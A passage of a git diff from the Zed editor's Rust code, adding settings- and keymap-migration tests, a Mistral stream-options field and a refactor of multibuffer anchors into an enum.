mod tests { ); // Profile: settings nested inside profiles should be migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_11_25::remove_context_server_source, )], @@ -2606,9 +2752,94 @@ mod tests { ); } + #[test] + fn test_make_auto_indent_an_enum() { + // Empty settings should not change + assert_migrate_with_migrations( + &[MigrationType::Json( + migrations::m_2025_01_27::make_auto_indent_an_enum, + )], + &r#"{ }"#.unindent(), + None, + ); + + // true should become "syntax_aware" + assert_migrate_with_migrations( + &[MigrationType::Json( + migrations::m_2025_01_27::make_auto_indent_an_enum, + )], + &r#"{ + "auto_indent": true + }"# + .unindent(), + Some( + &r#"{ + "auto_indent": "syntax_aware" + }"# + .unindent(), + ), + ); + + // false should become "none" + assert_migrate_with_migrations( + &[MigrationType::Json( + 
migrations::m_2025_01_27::make_auto_indent_an_enum, + )], + &r#"{ + "auto_indent": false + }"# + .unindent(), + Some( + &r#"{ + "auto_indent": "none" + }"# + .unindent(), + ), + ); + + // Already valid enum values should not change + assert_migrate_with_migrations( + &[MigrationType::Json( + migrations::m_2025_01_27::make_auto_indent_an_enum, + )], + &r#"{ + "auto_indent": "preserve_indent" + }"# + .unindent(), + None, + ); + + // Should also work inside languages + assert_migrate_with_migrations( + &[MigrationType::Json( + migrations::m_2025_01_27::make_auto_indent_an_enum, + )], + &r#"{ + "auto_indent": true, + "languages": { + "Python": { + "auto_indent": false + } + } + }"# + .unindent(), + Some( + &r#"{ + "auto_indent": "syntax_aware", + "languages": { + "Python": { + "auto_indent": "none" + } + } + }"# + .unindent(), + ), + ); + } + #[test] fn test_move_edit_prediction_provider_to_edit_predictions() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_02::move_edit_prediction_provider_to_edit_predictions, )], @@ -2616,7 +2847,7 @@ mod tests { None, ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_02::move_edit_prediction_provider_to_edit_predictions, )], @@ -2640,7 +2871,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_02::move_edit_prediction_provider_to_edit_predictions, )], @@ -2668,7 +2899,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_02::move_edit_prediction_provider_to_edit_predictions, )], @@ -2695,7 +2926,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_02::move_edit_prediction_provider_to_edit_predictions, )], @@ -2712,7 
+2943,7 @@ mod tests { // Non-object edit_predictions (e.g. true) should gracefully skip // instead of bail!-ing and aborting the entire migration chain. - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_02::move_edit_prediction_provider_to_edit_predictions, )], @@ -2736,7 +2967,7 @@ mod tests { ); // Platform key: settings nested inside "macos" should be migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_02::move_edit_prediction_provider_to_edit_predictions, )], @@ -2765,7 +2996,7 @@ mod tests { ); // Profile: settings nested inside profiles should be migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_02::move_edit_prediction_provider_to_edit_predictions, )], @@ -2798,7 +3029,7 @@ mod tests { ); // Combined: root + platform + profile should all be migrated simultaneously - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_02::move_edit_prediction_provider_to_edit_predictions, )], @@ -2849,7 +3080,7 @@ mod tests { #[test] fn test_migrate_experimental_sweep_mercury() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_03::migrate_experimental_sweep_mercury, )], @@ -2857,7 +3088,7 @@ mod tests { None, ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_03::migrate_experimental_sweep_mercury, )], @@ -2883,7 +3114,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_03::migrate_experimental_sweep_mercury, )], @@ -2909,7 +3140,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( 
&[MigrationType::Json( migrations::m_2026_02_03::migrate_experimental_sweep_mercury, )], @@ -2935,7 +3166,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_03::migrate_experimental_sweep_mercury, )], @@ -2950,7 +3181,7 @@ mod tests { None, ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_03::migrate_experimental_sweep_mercury, )], @@ -2968,7 +3199,7 @@ mod tests { ); // Platform key: settings nested inside "linux" should be migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_03::migrate_experimental_sweep_mercury, )], @@ -2999,7 +3230,7 @@ mod tests { ); // Profile: settings nested inside profiles should be migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_03::migrate_experimental_sweep_mercury, )], @@ -3034,7 +3265,7 @@ mod tests { ); // Combined: root + platform + profile should all be migrated simultaneously - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_03::migrate_experimental_sweep_mercury, )], @@ -3092,7 +3323,7 @@ mod tests { #[test] fn test_migrate_always_allow_tool_actions_to_default() { // No agent settings - no change - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3101,7 +3332,7 @@ mod tests { ); // always_allow_tool_actions: true -> tool_permissions.default: "allow" - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3128,7 +3359,7 @@ mod tests { ); // always_allow_tool_actions: false -> just remove it - 
assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3147,7 +3378,7 @@ mod tests { ); // Preserve existing tool_permissions.tools when migrating - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3186,7 +3417,7 @@ mod tests { ); // Don't override existing default (and migrate default_mode to default) - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3216,7 +3447,7 @@ mod tests { ); // Migrate existing default_mode to default (no always_allow_tool_actions) - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3245,7 +3476,7 @@ mod tests { ); // No migration needed if already using new format with "default" - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3263,7 +3494,7 @@ mod tests { ); // Migrate default_mode to default in tool-specific rules - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3302,7 +3533,7 @@ mod tests { ); // When tool_permissions is null, replace it so always_allow is preserved - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3330,7 +3561,7 @@ mod tests { ); // Platform-specific agent migration - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( 
migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3361,7 +3592,7 @@ mod tests { ); // Channel-specific agent migration - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3402,7 +3633,7 @@ mod tests { ); // Profile-level migration - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3440,7 +3671,7 @@ mod tests { ); // Platform-specific agent with profiles - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3485,7 +3716,7 @@ mod tests { ); // Root-level profile with always_allow_tool_actions - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3520,7 +3751,7 @@ mod tests { ); // Root-level profile with default_mode - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3557,7 +3788,7 @@ mod tests { ); // Root-level profile + root-level agent both migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3603,7 +3834,7 @@ mod tests { // Non-boolean always_allow_tool_actions (string "true") is left in place // so the schema validator can report it, rather than silently dropping user data. 
- assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3619,7 +3850,7 @@ mod tests { ); // null always_allow_tool_actions is removed (treated as false) - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3636,7 +3867,7 @@ mod tests { // Project-local settings (.zed/settings.json) with always_allow_tool_actions // These files have no platform/channel overrides or root-level profiles. - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3677,7 +3908,7 @@ mod tests { ); // Project-local settings with only default_mode (no always_allow_tool_actions) - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3706,7 +3937,7 @@ mod tests { ); // Project-local settings with no agent section at all - no change - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3721,7 +3952,7 @@ mod tests { ); // Existing agent_servers are left untouched - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3764,7 +3995,7 @@ mod tests { ); // Existing agent_servers are left untouched even with partial entries - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3801,7 +4032,7 @@ mod tests { ); // always_allow_tool_actions: false leaves agent_servers untouched - assert_migrate_settings_with_migrations( + 
assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3824,7 +4055,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_to_registry_simple() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -3864,7 +4095,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_empty_entries() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -3895,7 +4126,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_with_command() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -3933,7 +4164,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_gemini_with_command() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -3961,7 +4192,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_gemini_ignore_system_version_false() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -3989,7 +4220,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_gemini_ignore_system_version_true() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -4016,7 +4247,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_already_typed_unchanged() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( 
&[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -4038,7 +4269,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_preserves_custom_entries() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -4072,7 +4303,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_target_already_exists() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -4102,7 +4333,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_no_agent_servers_key() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -4117,7 +4348,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_all_fields() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -4165,7 +4396,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_codex_with_command() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -4197,7 +4428,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_mixed_migrated_and_not() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -4232,4 +4463,223 @@ mod tests { ), ); } + + #[test] + fn test_migrate_edit_prediction_conflict_context() { + assert_migrate_with_migrations( + &[MigrationType::TreeSitter( + migrations::m_2026_03_23::KEYMAP_PATTERNS, + 
&KEYMAP_QUERY_2026_03_23, + )], + &r#" + [ + { + "context": "Editor && edit_prediction_conflict", + "bindings": { + "ctrl-enter": "editor::AcceptEditPrediction" // Example of a modified keybinding + } + } + ] + "#.unindent(), + Some( + &r#" + [ + { + "context": "Editor && (edit_prediction && (showing_completions || in_leading_whitespace))", + "bindings": { + "ctrl-enter": "editor::AcceptEditPrediction" // Example of a modified keybinding + } + } + ] + "#.unindent(), + ), + ); + + assert_migrate_with_migrations( + &[MigrationType::TreeSitter( + migrations::m_2026_03_23::KEYMAP_PATTERNS, + &KEYMAP_QUERY_2026_03_23, + )], + &r#" + [ + { + "context": "Editor && edit_prediction_conflict && !showing_completions", + "bindings": { + // Here we don't require a modifier unless there's a language server completion + "tab": "editor::AcceptEditPrediction" + } + } + ] + "#.unindent(), + Some( + &r#" + [ + { + "context": "Editor && (edit_prediction && in_leading_whitespace)", + "bindings": { + // Here we don't require a modifier unless there's a language server completion + "tab": "editor::AcceptEditPrediction" + } + } + ] + "#.unindent(), + ), + ); + + assert_migrate_with_migrations( + &[MigrationType::TreeSitter( + migrations::m_2026_03_23::KEYMAP_PATTERNS, + &KEYMAP_QUERY_2026_03_23, + )], + &r#" + [ + { + "context": "Editor && edit_prediction_conflict && showing_completions", + "bindings": { + "tab": "editor::AcceptEditPrediction" + } + } + ] + "# + .unindent(), + Some( + &r#" + [ + { + "context": "Editor && (edit_prediction && showing_completions)", + "bindings": { + "tab": "editor::AcceptEditPrediction" + } + } + ] + "# + .unindent(), + ), + ); + + assert_migrate_with_migrations( + &[MigrationType::TreeSitter( + migrations::m_2026_03_23::KEYMAP_PATTERNS, + &KEYMAP_QUERY_2026_03_23, + )], + &r#" + [ + { + "context": "Editor && edit_prediction", + "bindings": { + "tab": "editor::AcceptEditPrediction", + // Optional: This makes the default `alt-l` binding do nothing. 
+ "alt-l": null + } + }, + { + "context": "Editor && edit_prediction_conflict", + "bindings": { + "alt-tab": "editor::AcceptEditPrediction", + // Optional: This makes the default `alt-l` binding do nothing. + "alt-l": null + } + }, + ] + "# + .unindent(), + Some( + &r#" + [ + { + "context": "Editor && edit_prediction", + "bindings": { + "tab": "editor::AcceptEditPrediction", + // Optional: This makes the default `alt-l` binding do nothing. + "alt-l": null + } + }, + { + "context": "Editor && (edit_prediction && (showing_completions || in_leading_whitespace))", + "bindings": { + "alt-tab": "editor::AcceptEditPrediction", + // Optional: This makes the default `alt-l` binding do nothing. + "alt-l": null + } + }, + ] + "# + .unindent(), + ), + ); + } + + #[test] + fn test_restructure_profiles_with_settings_key() { + assert_migrate_settings( + &r#" + { + "buffer_font_size": 14, + "profiles": { + "Presenting": { + "buffer_font_size": 20, + "theme": "One Light" + }, + "Minimal": { + "vim_mode": true + } + } + } + "# + .unindent(), + Some( + &r#" + { + "buffer_font_size": 14, + "profiles": { + "Presenting": { + "settings": { + "buffer_font_size": 20, + "theme": "One Light" + } + }, + "Minimal": { + "settings": { + "vim_mode": true + } + } + } + } + "# + .unindent(), + ), + ); + } + + #[test] + fn test_restructure_profiles_with_settings_key_already_migrated() { + assert_migrate_settings( + &r#" + { + "profiles": { + "Presenting": { + "settings": { + "buffer_font_size": 20 + } + } + } + } + "# + .unindent(), + None, + ); + } + + #[test] + fn test_restructure_profiles_with_settings_key_no_profiles() { + assert_migrate_settings( + &r#" + { + "buffer_font_size": 14 + } + "# + .unindent(), + None, + ); + } } diff --git a/crates/miniprofiler_ui/Cargo.toml b/crates/miniprofiler_ui/Cargo.toml index 3f48bdfe486da52fc0edb2a1b540b10375d4f995..a8041b8b37cb57148e6dcdcdb8df7f436e52701b 100644 --- a/crates/miniprofiler_ui/Cargo.toml +++ b/crates/miniprofiler_ui/Cargo.toml @@ -14,7 +14,7 
@@ path = "src/miniprofiler_ui.rs" [dependencies] gpui.workspace = true rpc.workspace = true -theme.workspace = true +theme_settings.workspace = true zed_actions.workspace = true workspace.workspace = true util.workspace = true diff --git a/crates/miniprofiler_ui/src/miniprofiler_ui.rs b/crates/miniprofiler_ui/src/miniprofiler_ui.rs index 1f95dc3d230e7c50b4960560a96c9007fd77aab8..351d0a68e2660870923a561ac8989559dc9abd7a 100644 --- a/crates/miniprofiler_ui/src/miniprofiler_ui.rs +++ b/crates/miniprofiler_ui/src/miniprofiler_ui.rs @@ -456,7 +456,7 @@ impl Render for ProfilerWindow { window: &mut gpui::Window, cx: &mut gpui::Context, ) -> impl gpui::IntoElement { - let ui_font = theme::setup_ui_font(window, cx); + let ui_font = theme_settings::setup_ui_font(window, cx); if !self.paused { self.poll_timings(cx); window.request_animation_frame(); @@ -464,7 +464,7 @@ impl Render for ProfilerWindow { let scroll_offset = self.scroll_handle.offset(); let max_offset = self.scroll_handle.max_offset(); - self.autoscroll = -scroll_offset.y >= (max_offset.height - px(24.)); + self.autoscroll = -scroll_offset.y >= (max_offset.y - px(24.)); if self.autoscroll { self.scroll_handle.scroll_to_bottom(); } @@ -544,7 +544,7 @@ impl Render for ProfilerWindow { let path = cx.prompt_for_new_path( &active_path, - Some("performance_profile.miniprof"), + Some("performance_profile.miniprof.json"), ); cx.background_spawn(async move { diff --git a/crates/mistral/src/mistral.rs b/crates/mistral/src/mistral.rs index cc9f94304d989c69c3f5a4bd3763704314564a19..0244f904468a5eb3e03b520a2687b31a1168f52b 100644 --- a/crates/mistral/src/mistral.rs +++ b/crates/mistral/src/mistral.rs @@ -233,6 +233,8 @@ pub struct Request { pub messages: Vec, pub stream: bool, #[serde(default, skip_serializing_if = "Option::is_none")] + pub stream_options: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] pub max_tokens: Option, #[serde(default, skip_serializing_if = "Option::is_none")] pub temperature: 
Option, @@ -246,6 +248,12 @@ pub struct Request { pub tools: Vec, } +#[derive(Debug, Serialize, Deserialize)] +pub struct StreamOptions { + #[serde(default, skip_serializing_if = "Option::is_none")] + pub stream_tool_calls: Option, +} + #[derive(Debug, Serialize, Deserialize)] #[serde(rename_all = "snake_case")] pub enum ResponseFormat { diff --git a/crates/multi_buffer/Cargo.toml b/crates/multi_buffer/Cargo.toml index 524c916682f4d17b4e4b598a9af158e259b40ffc..a06599999c8147dc464128ad8ab5e6bf5ad5755b 100644 --- a/crates/multi_buffer/Cargo.toml +++ b/crates/multi_buffer/Cargo.toml @@ -45,6 +45,7 @@ tree-sitter.workspace = true ztracing.workspace = true tracing.workspace = true util.workspace = true +unicode-segmentation.workspace = true [dev-dependencies] buffer_diff = { workspace = true, features = ["test-support"] } @@ -52,7 +53,6 @@ gpui = { workspace = true, features = ["test-support"] } indoc.workspace = true language = { workspace = true, features = ["test-support"] } pretty_assertions.workspace = true -project = { workspace = true, features = ["test-support"] } rand.workspace = true settings = { workspace = true, features = ["test-support"] } text = { workspace = true, features = ["test-support"] } diff --git a/crates/multi_buffer/src/anchor.rs b/crates/multi_buffer/src/anchor.rs index 8ae154148379f7cb7d806196a03b354e2f6130c5..08b159effafa2f34dbf1b10768bf356aaf74ae31 100644 --- a/crates/multi_buffer/src/anchor.rs +++ b/crates/multi_buffer/src/anchor.rs @@ -1,195 +1,331 @@ -use crate::{MultiBufferDimension, MultiBufferOffset, MultiBufferOffsetUtf16}; +use crate::{ + ExcerptSummary, MultiBufferDimension, MultiBufferOffset, MultiBufferOffsetUtf16, PathKey, + PathKeyIndex, find_diff_state, +}; -use super::{ExcerptId, MultiBufferSnapshot, ToOffset, ToPoint}; -use language::Point; +use super::{MultiBufferSnapshot, ToOffset, ToPoint}; +use language::{BufferSnapshot, Point}; use std::{ cmp::Ordering, ops::{Add, AddAssign, Range, Sub}, }; use sum_tree::Bias; +use 
text::BufferId; + +/// A multibuffer anchor derived from an anchor into a specific excerpted buffer. +#[derive(Clone, Copy, Debug, Eq, PartialEq, Hash)] +pub struct ExcerptAnchor { + pub(crate) text_anchor: text::Anchor, + pub(crate) path: PathKeyIndex, + pub(crate) diff_base_anchor: Option, +} /// A stable reference to a position within a [`MultiBuffer`](super::MultiBuffer). /// /// Unlike simple offsets, anchors remain valid as the text is edited, automatically /// adjusting to reflect insertions and deletions around them. #[derive(Clone, Copy, Eq, PartialEq, Hash)] -pub struct Anchor { - /// Identifies which excerpt within the multi-buffer this anchor belongs to. - /// A multi-buffer can contain multiple excerpts from different buffers. - pub excerpt_id: ExcerptId, - /// The position within the excerpt's underlying buffer. This is a stable - /// reference that remains valid as the buffer text is edited. - pub text_anchor: text::Anchor, - /// When present, indicates this anchor points into deleted text within an - /// expanded diff hunk. The anchor references a position in the diff base - /// (original) text rather than the current buffer text. This is used when - /// displaying inline diffs where deleted lines are shown. - pub diff_base_anchor: Option, +pub enum Anchor { + /// An anchor that always resolves to the start of the multibuffer. + Min, + /// An anchor that's attached to a specific excerpted buffer. + Excerpt(ExcerptAnchor), + /// An anchor that always resolves to the end of the multibuffer. 
+ Max, } -impl std::fmt::Debug for Anchor { +pub(crate) enum AnchorSeekTarget { + Excerpt { + path_key: PathKey, + anchor: ExcerptAnchor, + // None when the buffer no longer exists in the multibuffer + snapshot: Option, + }, + Empty, +} + +impl std::fmt::Debug for AnchorSeekTarget { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { - if self.is_min() { - return write!(f, "Anchor::min({:?})", self.text_anchor.buffer_id); + match self { + Self::Excerpt { + path_key, + anchor, + snapshot: _, + } => f + .debug_struct("Excerpt") + .field("path_key", path_key) + .field("anchor", anchor) + .finish(), + Self::Empty => write!(f, "Empty"), } - if self.is_max() { - return write!(f, "Anchor::max({:?})", self.text_anchor.buffer_id); + } +} + +impl std::fmt::Debug for Anchor { + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { + match self { + Anchor::Min => write!(f, "Anchor::Min"), + Anchor::Max => write!(f, "Anchor::Max"), + Anchor::Excerpt(excerpt_anchor) => write!(f, "{excerpt_anchor:?}"), } + } +} - f.debug_struct("Anchor") - .field("excerpt_id", &self.excerpt_id) - .field("text_anchor", &self.text_anchor) - .field("diff_base_anchor", &self.diff_base_anchor) - .finish() +impl From for Anchor { + fn from(anchor: ExcerptAnchor) -> Self { + Anchor::Excerpt(anchor) } } -impl Anchor { - pub fn with_diff_base_anchor(self, diff_base_anchor: text::Anchor) -> Self { - Self { - diff_base_anchor: Some(diff_base_anchor), - ..self +impl ExcerptAnchor { + pub(crate) fn buffer_id(&self) -> BufferId { + self.text_anchor.buffer_id + } + + pub(crate) fn text_anchor(&self) -> text::Anchor { + self.text_anchor + } + + pub(crate) fn with_diff_base_anchor(mut self, diff_base_anchor: text::Anchor) -> Self { + self.diff_base_anchor = Some(diff_base_anchor); + self + } + + pub(crate) fn cmp(&self, other: &Self, snapshot: &MultiBufferSnapshot) -> Ordering { + let Some(self_path_key) = snapshot.path_keys_by_index.get(&self.path) else { + panic!("anchor's path 
was never added to multibuffer") + }; + let Some(other_path_key) = snapshot.path_keys_by_index.get(&other.path) else { + panic!("anchor's path was never added to multibuffer") + }; + + if self_path_key.cmp(other_path_key) != Ordering::Equal { + return self_path_key.cmp(other_path_key); + } + + // in the case that you removed the buffer containing self, + // and added the buffer containing other with the same path key + // (ordering is arbitrary but consistent) + if self.text_anchor.buffer_id != other.text_anchor.buffer_id { + return self.text_anchor.buffer_id.cmp(&other.text_anchor.buffer_id); + } + + let Some(buffer) = snapshot.buffer_for_path(&self_path_key) else { + return Ordering::Equal; + }; + // Comparing two anchors into buffer A that formerly existed at path P, + // when path P has since been reused for a different buffer B + if buffer.remote_id() != self.text_anchor.buffer_id { + return Ordering::Equal; + }; + assert_eq!(self.text_anchor.buffer_id, buffer.remote_id()); + let text_cmp = self.text_anchor().cmp(&other.text_anchor(), buffer); + if text_cmp != Ordering::Equal { + return text_cmp; + } + + if (self.diff_base_anchor.is_some() || other.diff_base_anchor.is_some()) + && let Some(base_text) = find_diff_state(&snapshot.diffs, self.text_anchor.buffer_id) + .map(|diff| diff.base_text()) + { + let self_anchor = self.diff_base_anchor.filter(|a| a.is_valid(base_text)); + let other_anchor = other.diff_base_anchor.filter(|a| a.is_valid(base_text)); + return match (self_anchor, other_anchor) { + (Some(a), Some(b)) => a.cmp(&b, base_text), + (Some(_), None) => match other.text_anchor().bias { + Bias::Left => Ordering::Greater, + Bias::Right => Ordering::Less, + }, + (None, Some(_)) => match self.text_anchor().bias { + Bias::Left => Ordering::Less, + Bias::Right => Ordering::Greater, + }, + (None, None) => Ordering::Equal, + }; } + + Ordering::Equal } - pub fn in_buffer(excerpt_id: ExcerptId, text_anchor: text::Anchor) -> Self { - Self { - excerpt_id, - 
text_anchor, - diff_base_anchor: None, + fn bias_left(&self, snapshot: &MultiBufferSnapshot) -> Self { + if self.text_anchor.bias == Bias::Left { + return *self; + } + let Some(buffer) = snapshot.buffer_for_id(self.text_anchor.buffer_id) else { + return *self; + }; + let text_anchor = self.text_anchor().bias_left(&buffer); + let ret = Self::in_buffer(self.path, text_anchor); + if let Some(diff_base_anchor) = self.diff_base_anchor { + if let Some(diff) = find_diff_state(&snapshot.diffs, self.text_anchor.buffer_id) + && diff_base_anchor.is_valid(&diff.base_text()) + { + ret.with_diff_base_anchor(diff_base_anchor.bias_left(diff.base_text())) + } else { + ret.with_diff_base_anchor(diff_base_anchor) + } + } else { + ret } } - pub fn range_in_buffer(excerpt_id: ExcerptId, range: Range) -> Range { - Self::in_buffer(excerpt_id, range.start)..Self::in_buffer(excerpt_id, range.end) + fn bias_right(&self, snapshot: &MultiBufferSnapshot) -> Self { + if self.text_anchor.bias == Bias::Right { + return *self; + } + let Some(buffer) = snapshot.buffer_for_id(self.text_anchor.buffer_id) else { + return *self; + }; + let text_anchor = self.text_anchor().bias_right(&buffer); + let ret = Self::in_buffer(self.path, text_anchor); + if let Some(diff_base_anchor) = self.diff_base_anchor { + if let Some(diff) = find_diff_state(&snapshot.diffs, self.text_anchor.buffer_id) + && diff_base_anchor.is_valid(&diff.base_text()) + { + ret.with_diff_base_anchor(diff_base_anchor.bias_right(diff.base_text())) + } else { + ret.with_diff_base_anchor(diff_base_anchor) + } + } else { + ret + } } - pub fn min() -> Self { - Self { - excerpt_id: ExcerptId::min(), - text_anchor: text::Anchor::MIN, + #[track_caller] + pub(crate) fn in_buffer(path: PathKeyIndex, text_anchor: text::Anchor) -> Self { + ExcerptAnchor { + path, diff_base_anchor: None, + text_anchor, } } - pub fn max() -> Self { - Self { - excerpt_id: ExcerptId::max(), - text_anchor: text::Anchor::MAX, - diff_base_anchor: None, + fn is_valid(&self, 
